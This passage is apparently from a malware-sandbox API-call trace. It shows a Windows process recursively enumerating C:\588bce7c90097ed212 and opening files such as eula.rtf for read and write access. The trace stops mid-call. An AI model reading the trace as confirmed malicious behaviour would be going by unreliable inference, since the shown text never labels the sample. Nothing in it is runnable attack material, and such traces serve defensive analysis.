lpWideCharStr="C:\\588bce7c90097ed212", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212", lpUsedDefaultChar=0x0) returned 22 [0060.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0060.901] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.901] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0060.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0060.901] AreFileApisANSI () returned 1 [0060.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 22 [0060.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df18 [0060.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x4df18, cchWideChar=22 | out: lpWideCharStr="C:\\588bce7c90097ed212") returned 22 [0060.901] CreateFileW (lpFileName="C:\\588bce7c90097ed212" (normalized: "c:\\588bce7c90097ed212"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.901] GetLastError () returned 0x5 [0060.901] GetLastError () returned 0x5 [0060.901] SetLastError (dwErrCode=0x5) [0060.901] GetLastError () returned 0x5 [0060.902] SetLastError (dwErrCode=0x5) [0060.902] GetLastError () returned 0x5 [0060.902] SetLastError (dwErrCode=0x5) [0060.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0060.902] AreFileApisANSI () returned 1 [0060.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 22 [0060.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df18 [0060.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x4df18, cchWideChar=22 | out: lpWideCharStr="C:\\588bce7c90097ed212") returned 22 [0060.902] CreateFileW (lpFileName="C:\\588bce7c90097ed212" (normalized: "c:\\588bce7c90097ed212"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.902] GetLastError () returned 0x5 [0060.902] GetLastError () returned 0x5 [0060.902] SetLastError (dwErrCode=0x5) [0060.902] GetLastError () returned 0x5 [0060.902] SetLastError (dwErrCode=0x5) [0060.902] GetLastError () returned 0x5 [0060.902] SetLastError (dwErrCode=0x5) [0060.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0060.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0060.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0060.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.902] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.902] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.902] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.902] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0060.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0060.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0060.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0060.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0060.903] FindNextFileW (in: hFindFile=0x78850, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6fa258, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Boot", cAlternateFileName="")) returned 1 [0060.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0060.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f648 [0060.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0060.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0060.903] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78950 [0060.903] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.903] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1025", cAlternateFileName="")) returned 1 [0060.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0060.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dd90 [0060.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46198 [0060.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0060.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0060.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0060.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0060.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0060.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0060.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0060.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0060.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0060.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0060.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69490 [0060.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0060.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0060.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69490 | out: hHeap=0x20000) returned 1 [0060.903] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.903] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.903] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.904] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0060.904] AreFileApisANSI () returned 1 [0060.904] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1025", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1025", lpUsedDefaultChar=0x0) returned 27 [0060.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0060.904] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.904] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0060.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0060.904] AreFileApisANSI () returned 1 [0060.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0060.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78410 [0060.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x78410, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1025") returned 27 [0060.904] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025" (normalized: "c:\\588bce7c90097ed212\\1025"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.904] GetLastError () returned 0x5 [0060.904] GetLastError () returned 0x5 [0060.904] SetLastError (dwErrCode=0x5) [0060.904] GetLastError () returned 0x5 [0060.904] SetLastError (dwErrCode=0x5) [0060.904] GetLastError () returned 0x5 [0060.904] SetLastError (dwErrCode=0x5) [0060.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78410 | out: hHeap=0x20000) returned 1 [0060.904] AreFileApisANSI () returned 1 [0060.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0060.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78150 [0060.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x78150, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1025") returned 27 [0060.905] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025" (normalized: "c:\\588bce7c90097ed212\\1025"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.905] GetLastError () returned 0x5 [0060.905] GetLastError () returned 0x5 [0060.905] SetLastError (dwErrCode=0x5) [0060.905] GetLastError () returned 0x5 [0060.905] SetLastError (dwErrCode=0x5) [0060.905] GetLastError () returned 0x5 [0060.905] SetLastError (dwErrCode=0x5) [0060.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78150 | out: hHeap=0x20000) returned 1 [0060.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0060.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0060.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0060.905] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.905] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.905] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.905] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0060.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0060.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0060.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0060.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0060.905] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="1028", cAlternateFileName="")) returned 1 [0060.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0060.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0060.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0060.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0060.905] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\1025\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78250 [0060.906] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.906] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x1d8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0060.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0060.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0060.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0060.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0060.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0060.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0060.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0060.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0060.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0060.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0060.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46208 [0060.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0060.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0060.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0060.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0060.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0060.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0060.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0060.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0060.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0060.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0060.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x715b8 [0060.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0060.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0060.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0060.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0060.906] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.906] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.906] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.906] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0060.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0060.907] AreFileApisANSI () returned 1 [0060.907] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1025\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1025\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0060.907] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0060.907] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.907] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.907] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0060.907] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0060.907] AreFileApisANSI () returned 1 [0060.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0060.907] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0060.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 36 [0060.907] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0060.907] GetFileType (hFile=0x41c) returned 0x1 [0060.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0060.907] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0060.907] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0060.908] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0060.908] CloseHandle (hObject=0x41c) returned 1 [0060.908] AreFileApisANSI () returned 1 [0060.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0060.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0060.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 36 [0060.908] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0060.908] GetFileType (hFile=0x41c) returned 0x1 [0060.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0060.908] CloseHandle (hObject=0x41c) returned 1 [0060.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0060.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0060.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0060.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0060.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0060.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0060.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0060.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0060.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0060.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0060.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0060.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0060.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0060.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0060.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0060.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0060.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0060.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 